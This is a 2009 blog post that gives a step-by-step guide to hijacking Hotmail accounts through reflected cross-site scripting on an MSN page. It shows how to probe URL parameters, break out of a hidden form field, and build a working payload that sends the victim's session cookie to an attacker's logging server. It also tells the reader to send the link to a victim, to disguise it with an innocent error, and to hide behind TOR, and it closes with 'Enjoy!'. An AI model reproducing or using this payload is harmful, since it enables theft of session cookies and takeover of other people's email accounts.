Hacking Hotmail through XSS!!!

Posted on 05/12/2009 by

0



Microsoft codes are not always secure and to be very clear once again… with this XSS exploit. This is not the first XSS exploit that has been found others before it can attest it. How this is done?  Its very simple, when you are logged into Hotmail…a cookie is formed which easily allows you to access everytime you are in its Domain!… And since the cookie is not IP bound we’re able to false the cookie…because once its stolen we’re can able to use it to login…
Its basically means that we don’t need to know the password or even the e-mail id of the person. With the help of XSS we can put in a piece of JavaScript code that will send the cookie to a webserver with a log script. This can be written in PHP, ASP, CGI well almost language you want. The cookie can be falsed with Proxomitron!

Searching for an exploitable webpage s like being 50% based on absolutely clean luck! You have a dreadful amount of time to spend because there is software which is written for AUTO-SEARCHING XSS exploits.


When you’re searching…Keep these important points in mind!

. The page you’re penetrating for must be in the domain which is precise in the cookie. On the pages with ‘Logout’ buttons in Hotmail you’re using that cookie. I would suggest you adding some bookmark displaying your cookie like for example: javascript: alert(document.cookie); .

. You can virtually use any browser and I would suggest Mozilla Firefox…Why because its steady, safe and accessible on almost any OS. Opera or Internet Explorer are good to use as well… if you like them better. You’ll benefit of using Opera because it lets you manage your own cookies.

. If you want to be surreptitious use TOR or a proxy and you should be conscious though that DNS Leaking is still dangerous

One exploit example:
Just start the search and except for your security no other planning is needed. All you have to do is concentrate on the URL’s with GET variables…they’re normally vulnerable. When you open up a new page you check if your cookie is still alike to Hotmail’s login page cookie replace it with a GET-variable in the URL one by one.
Then again reload the page and view the page source! Check in the source if there are images or URL’s which also contain GET variables you maybe be able to exploit these.
Is your replaced variable there?… Try to make it in a way that it ends valid html/javascript and can display an error for you. Time and again special characters are escaped… An all round variable would look like this: hya"'><)(ho .

Exploit
The normal URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1& m=&col=1&tab=3

The test URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m= hya"'><ho&col=1&tab=3

A ctrl+f in the source for hya gives the invalid input:
<input type="hidden" name="m" value="hya"'><ho" />

To alert the cookie it needs to be like this:
<input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />

The exploited URL:
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=
hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3

In the last examples the cookie was alerted by Javascript you need the cookie to be sent to a webserver and there it needs to be logged

This is the edited URL so it sends the cookie to an webserver.
http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=
hya"><script>location.href='http://yourserver/logger.php?cookie= '%2Bescape(document.cookie)</script><br
class="ho&col=1&tab=3

.This is the link the person should click because as soon as he/she clicks it and his/her cookie is being sent to your server giving to be saved in your Log file. You can display some innocent error or readdress to another page.

Enjoy! 🙂

Advertisements
Posted in: Hacking, Web Hacing